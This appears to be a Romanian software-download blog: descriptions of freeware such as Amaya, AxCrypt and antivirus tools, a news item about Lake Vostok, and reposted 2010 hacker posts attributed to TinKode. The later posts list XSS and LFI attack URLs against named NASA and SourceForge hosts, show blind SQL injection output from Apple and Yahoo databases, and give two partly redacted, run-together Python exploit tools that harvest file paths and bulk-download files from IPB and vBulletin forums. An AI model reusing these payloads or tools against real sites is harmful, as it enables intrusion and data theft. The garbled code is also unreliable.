Amaya-Web editor

Download amaya-WinXP-11.4.4.exe


Amaya is a Web editor, i.e. a tool used to create and update documents directly on the Web. Browsing features are seamlessly integrated with the editing and remote access features in a uniform environment. This follows the original vision of the Web as a space for collaboration and not just a one-way publishing medium.
Work on Amaya started at W3C in 1996 to showcase Web technologies in a fully-featured Web client. The main motivation for developing Amaya was to provide a framework that can integrate as many W3C technologies as possible. It is used to demonstrate these technologies in action while taking advantage of their combination in a single, consistent environment.
Amaya started as an HTML + CSS style sheets editor. Since that time it was extended to support XML and an increasing number of XML applications such as the XHTML family, MathML, and SVG. It allows all those vocabularies to be edited simultaneously in compound documents.
Amaya includes a collaborative annotation application based on Resource Description Framework (RDF), XLink, and XPointer.

Amaya - Open Source
Amaya is an open source software project hosted by W3C. You are invited to contribute in many forms (documentation, translation, writing code, fixing bugs, porting to other platforms...).
The Amaya software is written in C and is available for Windows, Unix platforms and MacOS X.

Amaya Overview

Amaya is a complete web browsing and authoring environment.

• Amaya lets users both browse and author Web pages Using Amaya you can create Web pages and upload them onto a server. Authors can create a document from scratch, they can browse the web and find the information they need, copy and paste it to their pages, and create links to other Web sites. All this is done in a straightforward and simple manner, and actions are performed in a single consistent environment. Editing and browsing functions are integrated seamlessly in a single tool.
• Amaya maintains a consistent internal document model adhering to the DTD Amaya always represents the document internally in a structured way consistent with the Document Type Definition (DTD). A properly structured document enables other tools to further process the data safely.
  Amaya allows you to display the document structure at the same time as the formatted view, which is portrayed diagrammatically on the screen.
• Amaya is able to work on several documents at a time Several (X)HTML, native MathML (.mml) and SVG (.svg) documents can be displayed and edited at a time.
• Amaya helps authors create hypertext links The editor helps you create and text out links to other documents on the Web from the document you currently are working on. You can view the links and get a feel for how the information is interconnected. This feature is not limited to HTML anchors. With XLink, any MathML and SVG element can be a link too.
• Amaya includes a collaborative annotation application Annotations are external comments, notes, remarks that can be attached to any Web document or a selected part of the document.

It supports HTML 4.01, XHTML 1.0, XHTML Basic, XHTML 1.1, HTTP 1.1, MathML 2.0, many CSS 2 features, and SVG.
It now includes a SVG editor (for a subset of the language). You can display and partially edit XML documents. It's an internationalized application. It provides an advanced user interface with contextual menus, a customizable set of menus and tools, predefined themes.
Distributions are available for Linux, Windows and now MacOS X PowerPC and Intel.
This version provides a template support partly funded by the 6th Framework Programme of the European Commission as part of the Palette project.

Read More

AxCrypt

Download AxCrypt

OS Type	Download	Description	Type
32- or 64-bit	AxCrypt-1.7.2867.0-Setup.exe	File Encryption	Installer
32- or 64-bit	AxCrypt2Go.exe	File Encryption	Portable
32- or 64-bit	AxDecrypt.exe	Decryption Only	Portable
Android 1.6+	XecretsDroidView-2678.apk	Password Manager	App

AxCrypt - Password Protect Files With Strong Encryption


Features
The following are features that really set it apart from all other file encryption tools, commercial as well as free:
    * Double-click to edit/view with any application.
    * Automatic re-encryption after modification.
    * Absolutely no user configuration necessary or possible before use.
    * Open source under GNU General Public License.
    * 12 languages in one executable distribution.
    * Extensive command-line interface for scripting and programming.

Other features
    * Windows 2003/XP/Vista/2008/7 32- and 64-bit compatible.
    * AES encryption with 128-bit keys.
    * Edit an encrypted document directly with double-click.
    * Optional pass phrase cache - type pass phrases once per logon and/or reboot.
    * Automatic pass phrase validation before decryption or editing.
    * Key-File generation and support.
    * No options or user interface - easy to install and use.
    * Relatively light-weight, less than 1Mb download
    * Extensive command-line interface.
    * Server mode options.
    * Support for files larger than 4GB (except for self-decrypting files).
    * Dynamic brute force counter measure - iterative key wrapping.
    * Integrates well with web based file sharing services.
    * Selective compression before encryption - faster downloads/uploads.
    * Retains original file name and information of an encrypted file.
    * Integrated shredder.
    * Shredding of all temporary and encrypted plaintext files.
    * Secure memory handling - no keys or data in the paging file.
    * Industry standard algorithms.
    * Data integrity verification - no undetected modification.
    * Unique data encryption keys used for every file and (re-)encryption.
    * Easy to add more languages - contact me (I'm especially looking for Nordic languages)!
    * Open source - no backdoors.
    * Private branding support for commercial or corporate versions.
    * It's FREE!

Read More

Ashampoo burning studio 6 free

Download ashampoo_burning_studio_6_free_6.80_4312


Multi-disc file backup and restore on CDs, DVDs and Blu-ray discs; create compressed backup archives with powerful password protection; split archives automatically across multiple CDs, DVDs or Blu-ray discs; restore archive contents to their original locations; integrated Audio CD ripper store your audio tracks as WMA or WAV files; new option for setting the number of copies you want to burn (available for all disc formats); discs can now be verified immediately without being ejected first (if the drive supports this feature); numerous other small improvements that make the program easier to use and more effective; burn files and folders on data CDs/DVDs/Blu-ray discs; burn Audio CDs from WAV, MP3, FLAC, WMA and Ogg Vorbis files; burn MP3-CDs from your MP3 files; burn Video DVD, Video CD (VCD) or Super Video CD (S-VCD); create and burn CD/DVD/Blu-ray disc images; burn speed and other options can all be set automatically.

Read More

Ulead Gif Animator 5.0.5

Download Ulead GIF Animator 5.0.5

Ulead GIF Animator 5.0 makes it easy to create fast-loading, high-impact Web animations. Version 5.0 cuts production time in half with simple drag-and-drop object-based editing, round-trip auto-updating from external image editors, and tweening features. Advanced optimization delivers the smallest possible file sizes, while output to video, EXE, and Flash formats makes it one of the most versatile animation tools available.

---

Keywords: Baner Creator, Corel Software, Downloads, Free to try software, Gif Animator, Trial Software, Web animations.

---

Read More

Bitdefender Antivirus Free Edition

Download Bitdefender Antivirus Free Edition EN
Download Bitdefender Antivirus Free Edition RO


Bitdefender Free Edition uses the same ICSA Labs certified scanning engines found in other Bitdefender products, allowing you to enjoy basic virus protection for no cost at all.

This free antivirus software download is an on-demand virus scanner, which is best used in a system recovery or forensics role. If you are on an "always-on" Internet connection, we strongly advise you to consider using a more complex antivirus solution.
Features and Benefits
Virus Scanning & Removal
On-demand scanning - powerful scan engines ensure detection and removal of all viruses in the wild every time you need it.
Scheduled Scanning
The Scheduler lets you plan ahead, and schedule full system/drive scans in the off hours, when you won't be using your computer.
Immediate Scanning
With just a simple right-click, you can check your files and folders.
Quarantine
By isolating the infected files in quarantine, the risk of getting infected diminishes. You also have the possibility to send these files for further analysis to Bitdefender Labs.
Reports
When launching a scan you may choose to create a report file where you can see statistics about the scan process.

Read More

Cercetătorii ruşi au ajuns la suprafaţa misteriosului lac de sub Antarctica, după 30 de ani de foraje

Cercetătorii ruşi au reuşit să ajungă la suprafaţa misteriosului lac Vostok din Antarctica, ascuns sub un strat de gheaţă de aproape patru kilometri, după foraje care au durat peste 30 de ani, a anunţat, luni, o sursă din mediile ştiinţifice ruse.

"Duminică, oamenii noştri de ştiinţă au încheiat operaţiunile de forare şi au atins suprafaţa lacului, la o adâncime de 3.768 de metri", sub calota glaciară de la Polul Sud, a declarat această sursă, citată de agenţia Ria Novosti.
Izolat de suprafaţa continentului de multe milioane de ani, acest lac cu apă pură, lung de 250 de kilometri şi lat de 50 de kilometri, ar putea să conţină forme de viaţă necunoscute până în zilele noastre.
Lucrările de forare au fost reluate în ianuarie, după ce au fost întrerupte în 1998, la adâncimea de 3.580 de metri, la o distanţă de doar 188 de metri deasupra lacului.

Acea întrerupere a intervenit în urma apelurilor comunităţii internaţionale, care a cerut Rusiei să aştepte apariţia unor tehnologii de forare mai sigure, cu scopul de a evita producerea unei catastrofe ecologice.
"Un eveniment de importanţă mondială ne aşteaptă în 2012. Vom atinge suprafaţa lacului Vostok, vechi de 30 de milioane de ani", declara anul trecut ministrul rus pentru Resurse naturale şi Ecologie, Iuri Trutnev. "Nimeni nu a reuşit încă să ajungă la o astfel de adâncime pe Terra", a adăugat el.
Examinarea structurii calotei glaciare şi a apei din acest lac misterios îi va ajuta pe savanţi să alcătuiască un "scenariu" al schimbărilor climatice naturale, aplicabil pentru următoarele milenii, afirmă oamenii de ştiinţă din Rusia.

Sursa:Mediafax

Read More

Kaspersky Mobile Security

Download Kaspersky Mobile Security

Features

• Protects Privacy - for your eyes only
• Locates a lost or stolen smartphone
• Secures contacts, photos and files from unauthorized access
• Blocks unwanted calls or SMSs
• Has Parental control
• Protects your smartphone from malware and network attacks

Read More

Avast Free Antivirus 6

Download Avast Free Antivirus 6 

The latest version of avast! antivirus kernel features outstanding detection abilities, together with high performance. You can expect 100% detection of In-the-Wild viruses (viruses already spreading between users) and excellent detection of Trojan horses.
The avast! engine also features outstanding unpacking support. It can scan inside the following archives: ARJ, ZIP, MIME (+ all associated formats), MAPI (Outlook pst files), DBX (Outlook Express archives), RAR, TAR, GZIP, CAB, BZIP2, ZOO, ACE, ARC, LHA/LHX, TNEF (winmail.dat), CPIO, CHM, RPM, ISO, 7ZIP and SIS. It also supports a number of executable packers (such as PKLite, Diet, UPX, ASPack, PeShield, FSG, MEW etc.).
Resident protection (the real-time protection of the operating system), is one of the most important parts of an antivirus program today. avast! features a powerful resident module that is able to detect a virus before it has any chance to infect your computer. avast! Home Edition contains resident protection of the computer file system and a resident module for e-mails and news.
Avast features a module for the protection of IM (Instant Messaging, "chat") programs, and a module for the protection of P2P (peer-to-peer) programs. The list of supported IM and P2P programs is extensive with more than 30 programs currently supported.

Read More

3DP Chip and 3DP Net

Download 3DP Chip

Download 3DP Net

Ever had painful headaches searching through the web trying to find the correct drivers for your newly formatted PC?
3DP Chip and 3DP Net are extremely useful freewares that will minimize your effort and time spent in finding the drivers for your PC components!
3DP Net has the ability to automatically install the right network driver for your PC even if you reinstalled Windows and cannot connect to the internet due to the absence of appropriate driver. 3DP Net will detect which network adapter is installed on your PC and automatically choose the right driver from its integrated ethernet card driver pool that enables to use the internet with breeze.
3DP Chip is another useful program that will automatically detect and display the information on your CPU, motherboard, video card and sound card installed on your PC. You can also choose to copy these information into your clipboard with one click for later use (such as posting in a forum). If you have working internet connection, you can choose to download the latest drivers for all of these components.
We recommend you to run 3DP Net first after reinstalling Windows to detect network adapter and install driver, then once you get hold of internet connection, run 3DP Chip for other component drivers.

Read More

TinKode-How to find XSS in NASA

How to find XSS in NASA

Posted by isrtinkode on February 16, 2010

__   __ _____ _____   _   _           _____
\ \ / // ____/ ____| | \ | |   /\    / ____|  /\
 \ V /| (___| (___   |  \| |  /  \  | (___   /  \
  > <  \___ \\___ \  | . ` | / /\ \  \___ \ / /\ \
 / . \ ____) |___) | | |\  |/ ____ \ ____) / ____ \
/_/ \_\_____/_____/  |_| \_/_/    \_\_____/_/    \_\

#How to find XSS in NASA?

Verry simple. What you have to do, is only to type on google, inurl:”tinkode”, and that it’s all.

Link google:

http://www.google.ro/search?hl=ro&client=firefox-a&rls=org.mozilla:en-US:official&hs=6Pn&q=*********&start=40&sa=N

Link Nasa XSS:

http://winds.jpl.nasa.gov/imagesAnim/images.cfm?pageName=ImagesAnim&subPageName=QuikSCAT&Image=QS_S1B28872%22%*********TinKode/%29%3C/script%3E

Yeah, this XSS is indexed on google, LOL.

Another XSS in NASA:

1. http://uavsar.jpl.nasa.gov/cgi-bin/data.pl?itext=1%22%3E%3*********/script%3E

2. http://hitf.jsc.nasa.gov/hitfpub/redirect.cfm?location=1%3C*********%29%3C/script%3E
3. http://sbir.gsfc.nasa.gov/sbirweb/search/searchResults.jsp?st=%*********/c0de.breaker/)%3C/script%3E

4. http://nmp.jpl.nasa.gov/ds2/search/search.pl?Range=All&Format=Standard&Terms=*********)%3C/script%3E

5. http://pims.grc.nasa.gov/calendars/qs_roadmap_index.php?year=*********)%3C/script%3E

6. http://starbeam.jpl.nasa.gov/tools/text-search/results.jsp?query=*********)%3C/script%3E

etc

Read More

TinKode-SourceForge LFI

SourceForge LFI

Posted by isrtinkode on February 18, 2010

 ____                            __
/ ___|  ___  _   _ _ __ ___ ___ / _| ___  _ __ __ _  ___
\___ \ / _ \| | | | '__/ __/ _ \ |_ / _ \| '__/ _` |/ _ \
 ___) | (_) | |_| | | | (_|  __/  _| (_) | | | (_| |  __/
|____/ \___/ \__,_|_|  \___\___|_|  \___/|_|  \__, |\___|
                                              |___/

Link: Sourceforge.net
Yeah, it’s vulnerable to LFI (Local File Inclusion).

http://in-dtsc.sourceforge.net/index.php?content=**********
http://in-dtsc.sourceforge.net/index.php?content=*******/conf/htt***.conf

For more informations read a tutorial about LFI.

Read More

TinKode-APPLE Vulnerable to Blind SQLi

APPLE Vulnerable to Blind SQLi

Posted by isrtinkode on February 18, 2010

          _____  _____  _      ______
    /\   |  __ \|  __ \| |    |  ____|
   /  \  | |__) | |__) | |    | |__
  / /\ \ |  ___/|  ___/| |    |  __|
 / ____ \| |    | |    | |____| |____
/_/    \_\_|    |_|    |______|______|
  #BlindSQLi by TinKode

@Apple
Apple is an American multinational corporation that designs and manufactures consumer electronics and computer software products.
The company’s best-known hardware products include Macintosh computers, the iPod, and the iPhone.
Apple software includes the Mac OS X operating system, the iTunes media browser, the iLife suite of multimedia and creativity software, the iWork suite of productivity software, Final Cut Studio, a suite of professional audio and film-industry software products, and Logic Studio, a suite of audio tools.
The company operates more than 250 retail stores in nine countries, and an online store where hardware and software products are sold.

Yeah, so it’s a huge company, but have a low security. Sad.
This parameter can be found by anyone in only 5 min with google.

Testing:

Now let’s see the version

#Version: 5
#Databases: locator_asia, test

#Tables from “locator_asia” database

[0]: reseller_city_utf8
[1]: reseller_district_utf8
[2]: reseller_provice_utf8
[3]: resellers_cn_utf8
[4]: resellers_company_utf8
[5]: resellers_emaillog
[6]: resellers_hk
[7]: resellers_hk_area
[8]: resellers_hk_district
[9]: resellers_id
[10]: resellers_id_area
[11]: resellers_id_district
[12]: resellers_kr
[13]: resellers_kr_area
[14]: resellers_kr_district
[15]: resellers_mo
[16]: resellers_mo_area
[17]: resellers_mo_district
[18]: resellers_my
[19]: resellers_my_area
[20]: resellers_my_district
[21]: resellers_ph
[22]: resellers_ph_area
[23]: resellers_ph_district
[24]: resellers_sg
[25]: resellers_sg_area
[26]: resellers_sg_company
[27]: resellers_th
[28]: resellers_th_area
[29]: resellers_th_district
[30]: resellers_tw
[31]: resellers_tw_area
[32]: resellers_tw_district
[33]: resellers_type
[34]: resellers_vn
[35]: resellers_vn_area
[36]: resellers_vn_district
[37]: sms_black_list
[38]: sms_log
[39]: sms_user_action_log

#Tables from “test” database

[0]: StoreRedir
[1]: downloadqueue
[2]: iwork
[3]: qtcomp

Columns from “reseller_city_utf8” table

[0]: id
[1]: provice_id
[2]: city
[3]: city_spell
[4]: municipality_flag
[5]: near1
[6]: near2
[7]: near3
[8]: near4

A good thing is that there is nothing important to extract…
Great, good bye, TinKode

Read More

TinKode-Yahoo Blind SQL Injection

Yahoo Blind SQL Injection

Posted by isrtinkode on February 18, 2010

__     __   _                   ____  _ _           _    _____  ____  _      _
\ \   / /  | |                 |  _ \| (_)         | |  / ____|/ __ \| |    (_)
 \ \_/ /_ _| |__   ___   ___   | |_) | |_ _ __   __| | | (___ | |  | | |     _
  \   / _` | '_ \ / _ \ / _ \  |  _ <| | | '_ \ / _` |  \___ \| |  | | |    | |
   | | (_| | | | | (_) | (_) | | |_) | | | | | | (_| |  ____) | |__| | |____| |
   |_|\__,_|_| |_|\___/ \___/  |____/|_|_|_| |_|\__,_| |_____/ \___\_\______|_|

                                            #By c0de.breaker@Romania

Yahoo! Inc. is an American public corporation headquartered in Sunnyvale, California, (in Silicon Valley), that provides Internet services worldwide. The company is perhaps best known for its web portal, search engine (Yahoo! Search), Yahoo! Directory, Yahoo! Mail, Yahoo! News, advertising, online mapping (Yahoo! Maps), video sharing (Yahoo! Video), and social media websites and services.
According to Web traffic analysis companies (including Compete.com, comScore, Alexa Internet, Netcraft, and Nielsen Ratings), the domain yahoo.com attracted at least 1.575 billion visitors annually by 2008. The global network of Yahoo! websites receives 3.4 billion page views per day on average as of October 2007. It is the second most visited website in the world in May 2009.

Vulnerable website: http://hk.adspecs.yahoo.com

Testing…

In this picture we can see as SELECT work

Now we try to find the version:

#Version: 5.0.11.24

Ok, it’s normal until now, but we can have access to mysql.user (bad)

And some tables from mysql.user (default)

MySQL Database, Table: user
#user
#password

~TinKode

Read More

TinKode-IPB Full Disclosure Exploit [Python]

IPB Full Disclosure Exploit [Python]

Posted by isrtinkode on February 19, 2010

#! /usr/bin/env python3.1

################################################################
#           _____ _____  ____  (validator.php)            #
#         |_   _|  __ \|  _ \                            #
#    | | | |__) | |_) |                           #
#     | | |  ___/|  _ <                            #
#     _| |_| |    | |_) |                           #
#     |_____|_|    |____/                            #
#                                   @expl0it...                #
################################################################
#          [ IPB Files / Directories Full Disclosure ]         #
#    [ Vuln discovered by TinKode / xpl0it written by cmiN ]   #
#           [ Greetz: insecurity.ro, darkc0de.com ]            #
################################################################
#                                                              #
#                 Special thanks for: cmiN                     #
#                 www.TinKode.BayWords.com                     #
################################################################

#! /usr/bin/env python3.1 ################################################################ # _____ _____ ____ (validator.php) # # |_ _| __ \| _ \ # # | | | |__) | |_) | # # | | | ___/| _ < # # _| |_| | | |_) | # # |_____|_| |____/ # # @expl0it... # ################################################################ # [ IPB Files / Directories Full Disclosure ] # # [ Vuln discovered by TinKode / xpl0it written by cmiN ] # # [ Greetz: insecurity.ro, darkc0de.com ] # ################################################################ # # # Special thanks for: cmiN # # www.TinKode.BayWords.com # ################################################################ import os, sys, urllib.request, urllib.parse, threading def main(): logo = """ \t |---------------------------------------------------------------| \t | _____ _____ ____ (TM) | \t | |_ _| __ \| _ \ | \t | | | | |__) | |_) | | \t | | | | ___/| _ < | \t | _| |_| | | |_) | | \t | |_____|_| |____/ | \t | | \t | | \t | IPB Full Disclosure expl0it | \t | Written by cmiN | \t | Vulnerability discovered by TinKode | \t | | \t | | \t | Visit: www.insecurity.ro & www.darkc0de.com | \t |---------------------------------------------------------------| """ usage = """ |---------------------------------------------------------------| |Usage: ipbfd.py scan http://www.site.com/IPB_folder | | ipbfd.py download *.zip -> all | | ipbfd.py download name.jpg -> one | |---------------------------------------------------------------|""" if sys.platform in ("linux", "linux2"): clearing = "clear" else: clearing = "cls" os.system(clearing) print(logo) args = sys.argv if len(********) == 3: try: print("Please wait...") if args[1] == "********": extract_parse_save(********)) elif args[1] == "********": download_data(********]) except Exception as message: print("An error occurred: ********)) except: print("Unknown error.") else: print(********") else: print(usage) input() def extract_parse_save(url): print("[+]Extracting content...") hurl = url + "/validator.php" with ********.********) as usock: source = usock.read().decode() print("[+]Finding token...") word = "validate('" index = source.find(word) if index != -1: source = source[********):] value = source[:source.index(********)] hurl = url ********.format(********) else: print("[!]Token not found.") print("[+]********...") with urllib.request.******** as usock: lastk, lastv = None, None dictionary = dict() for line in usock: line = line.decode() index = line.find(********) if index != -1: lastk = line[index + ********" ").strip(********) index = line.find(********") if index != -1: lastv = line[index + ********:line.index("********")].********(" ") if lastk != None and lastv != None: index = ********") if index in (********, 0): lastk = "[other] {}".format(lastk) else: lastk = "[********}".format(********) dictionary[********astv ******** = None, None print("[+]Organizing and saving paths...") with open("********", "********") as fout: fout.write(********) keys = sorted(********) for key in keys: fout.write(********)) def download_data(files): print("[+]Searching ********...") mthreads = ******** with open(********) as fin: url = fin.readline()********) if files.find("*") == -1: hurl = ********) Download(hurl).start() else: ext = files[files.********] for line in fin: pieces = l********) if pieces[0].count(ext) == 1: upath = pieces[1] hurl = ********) while threading.active********reads: pass Download(********) while threading.active_count(******** pass class Download(********): def __********): threading.Thread.********) ******** = url def run(self): try: with urllib.request.urlopen(********usock: data = ********) uparser = urllib.parse.urlparse(********) pieces = uparser.********) ******** = pieces[********] with open(********) as fout: fout.********) except: pass ********__main__": main()

You must have python 3.1 to work!

Read More

TinKode-vBulletin Full Disclosure [Python]

vBulletin Full Disclosure [Python]

Posted by isrtinkode on February 19, 2010

#! /usr/bin/env python3.1
#
################################################################
#                ____        _ _      _   _ (validator.php)    #
#               |  _ \      | | |    | | (_)                   #
#         __   _| |_) |_   _| | | ___| |_ _ _ __               #
#         \ \ / /  _ <| | | | | |/ _ \ __| | '_ \              #
#          \ V /| |_) | |_| | | |  __/ |_| | | | |             #
#           \_/ |____/ \__,_|_|_|\___|\__|_|_| |_|             #
#                                   @expl0it...                #
################################################################
#       [ vBulletin Files / Directories Full Disclosure ]      #
#    [ Vuln discovered by TinKode / xpl0it written by cmiN ]   #
#           [ Greetz: insecurity.ro, darkc0de.com ]            #
################################################################
#                                                              #
#                  Special thanks for: cmiN                    #
#                  www.TinKode.BayWords.com                    #
################################################################

#! /usr/bin/env python3.1 # ################################################################ # ____ _ _ _ _ (validator.php) # # | _ \ | | | | | (_) # # __ _| |_) |_ _| | | ___| |_ _ _ __ # # \ \ / / _ <| | | | | |/ _ \ __| | '_ \ # # \ V /| |_) | |_| | | | __/ |_| | | | | # # \_/ |____/ \__,_|_|_|\___|\__|_|_| |_| # # @expl0it... # ################################################################ # [ vBulletin Files / Directories Full Disclosure ] # # [ Vuln discovered by TinKode / xpl0it written by cmiN ] # # [ Greetz: insecurity.ro, darkc0de.com ] # ################################################################ # # # Special thanks for: cmiN # # www.TinKode.BayWords.com # ################################################################ import os, sys, urllib.request, urllib.parse, threading def main(): logo = """ \t |---------------------------------------------------------------| \t | ____ _ _ _ _ (TM) | \t | | _ \ | | | | | (_) | \t | __ _| |_) |_ _| | | ___| |_ _ _ __ | \t | \ \ / / _ <| | | | | |/ _ \ __| | '_ \ | \t | \ V /| |_) | |_| | | | __/ |_| | | | | | \t | \_/ |____/ \__,_|_|_|\___|\__|_|_| |_| | \t | | \t | vBulletin Full Disclosure expl0it | \t | Written by cmiN | \t | Vulnerability discovered by TinKode | \t | | \t | Dork: intext:"Powered by vBulletin" | \t | Visit: www.insecurity.ro & www.darkc0de.com | \t |---------------------------------------------------------------| """ usage = """ |---------------------------------------------------------------| |Usage: vbfd.py scan http://www.site.com/vB_folder | | vbfd.py download *.sql -> all | | vbfd.py download name.jpg -> one | |---------------------------------------------------------------|""" if sys.platform in ("linux", "linux2"): clearing = "clear" else: clearing = "cls" os.system(clearing) print(logo) args = sys.argv if len(args) == 3: try: print("Please wait...") if args[1] == "scan": extract_parse_save(********)) elif args[1] == "********": download_data(********) except Exception as message: print("An error occurred: {}".********) except: print("Unknown error.") else: print(********) else: print(usage) input() def extract_parse_save(url): print("[+]********...") hurl = url + "/validator.php" with urllib.request.******** as usock: source = ********() print("[+]Finding ********") word = "validate('" source = source[source******** + len(word):] value = ********] print("[+]Obtaining paths...") hurl = url + "/validator********(value) with urllib.request.urlopen(hurl) as usock: lastk, lastv = None, None dictionary = dict() for line in usock: line = ********() index = ********") if index != -1: lastk = line[index ********(" ") index = line.find("********") if index != -1: lastv = line********) if lastk != None and lastv != None: index = ********) if index in (-1, 0): lastk = "********) else: lastk = "[{}] {}".format(********) dictionary[lastk] = lastv lastk, lastv = None, None print("[+]Organizing and saving paths...") with open(********) as fout: fout.********) keys = sorted(dictionary.keys()) for key in keys: fout.write********(key, dictionary[key])) def download_data(files): print("[+]Searching and downloading files...") ******** = 50 with open("********) as fin: url = fin.readline(********) if files.find******** hurl = url + ********) Download(hurl).start() else: ext = files[files.********] for line in fin: pieces = line********) if pieces[0].******** upath = pieces[1] hurl = ********) while threading.active_********) > ******** pass Download(********).start() while threading.********) > 1: pass class Download(********): def __init__(self, url): threading.Thread.__********) self.url = ******** def run(********): try: with urllib.request.urlopen(self.url) as usock: data = ********() uparser = urllib.parse.urlparse(********) pieces = ********.********) fname = pieces[********] with open(********) as fout: ********.write(data) except: pass ********"__main__": main()

You need python 3.1 to work!

Read More